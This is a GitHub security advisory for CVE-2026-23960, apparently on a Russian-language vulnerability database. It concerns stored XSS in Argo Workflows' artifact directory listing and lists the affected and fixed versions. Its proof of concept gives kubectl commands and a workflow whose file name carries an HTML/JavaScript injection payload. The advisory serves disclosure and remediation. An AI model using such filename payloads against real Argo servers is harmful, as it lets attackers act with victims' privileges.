GHSA-cv78-6m8q-ph82

Опубликовано: 21 янв. 2026

Источник: github

Github: Прошло ревью

CVSS4: 7.3

Описание

Argo Workflows affected by stored XSS in the artifact directory listing

Summary

Stored XSS in the artifact directory listing allows any workflow author to execute arbitrary JavaScript in another user’s browser under the Argo Server origin, enabling API actions with the victim’s privileges.

Details

The directory listing response in server/artifacts/artifact_server.go renders object names directly into HTML via fmt.Fprintf without escaping. Object names come from driver.ListObjects(...) and are attacker‑controlled when a workflow writes files into an output artifact directory.

https://github.com/argoproj/argo-workflows/blob/9872c296d29dcc5e9c78493054961ede9fc30797/server/artifacts/artifact_server.go#L194-L244

PoC

Deploy Argo Workflows:

kubectl create ns argo kubectl apply --server-side -f manifests/base/crds/full kubectl apply --server-side -k manifests/quick-start/postgres

Port‑forward Argo Server:

kubectl -n argo port-forward deploy/argo-server 2746:2746

Create the PoC workflow:

cat > /tmp/argo-xss.yaml <<'EOF' apiVersion: argoproj.io/v1alpha1 kind: Workflow metadata: generateName: xss-artifact-test- spec: entrypoint: main templates: - name: main container: image: alpine command: [sh, -c] args: - | mkdir -p /tmp/artifacts touch '/tmp/artifacts/xss"><img src=x onerror="alert(document.domain)">.html' outputs: artifacts: - name: dir path: /tmp/artifacts archive: none: {} EOF

kubectl -n argo create -f /tmp/argo-xss.yaml

Wait for completion:

kubectl -n argo get wf -w

Get the node ID:

kubectl -n argo get wf <wf-name> \ -o jsonpath='{range .status.nodes.*}{.id}{"\t"}{.displayName}{"\n"}{end}'

Open the listing: https://localhost:2746/artifact-files/argo/workflows/<wf-name>/<node-id>/outputs/dir/

Impact

The attacker creates a workflow that produces a HTML artifact that contains a HTML file that contains a script which uses XHR calls to interact with the Argo Server API.
The attacker emails the deep-link to the artifact to their victim. The victim opens the link, the script starts running.

As the script has access to the Argo Server API (as the victim), so may do the following (if the victim may):

Read information about the victim’s workflows.
Create or delete workflows.

Ссылки

Пакеты

Наименование

github.com/argoproj/argo-workflows/v3

Затронутые версииВерсия исправления

< 3.6.17

3.6.17

Наименование

github.com/argoproj/argo-workflows/v3

Затронутые версииВерсия исправления

>= 3.7.0, <= 3.7.7

3.7.8

Наименование

github.com/argoproj/argo-workflows

Затронутые версииВерсия исправления

<= 2.5.3-rc4

Отсутствует

EPSS

Процентиль: 18%

0.00056

Низкий

7.3 High

CVSS4

CVE ID

CVE-2026-23960

Дефекты

CWE-79

Связанные уязвимости

CVE-2026-23960

nvd

16 дней назад

Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to versions 3.6.17 and 3.7.8, stored XSS in the artifact directory listing allows any workflow author to execute arbitrary JavaScript in another user’s browser under the Argo Server origin, enabling API actions with the victim’s privileges. Versions 3.6.17 and 3.7.8 fix the issue.

EPSS

Процентиль: 18%

0.00056

Низкий

7.3 High

CVSS4

CVE ID

CVE-2026-23960

Дефекты

CWE-79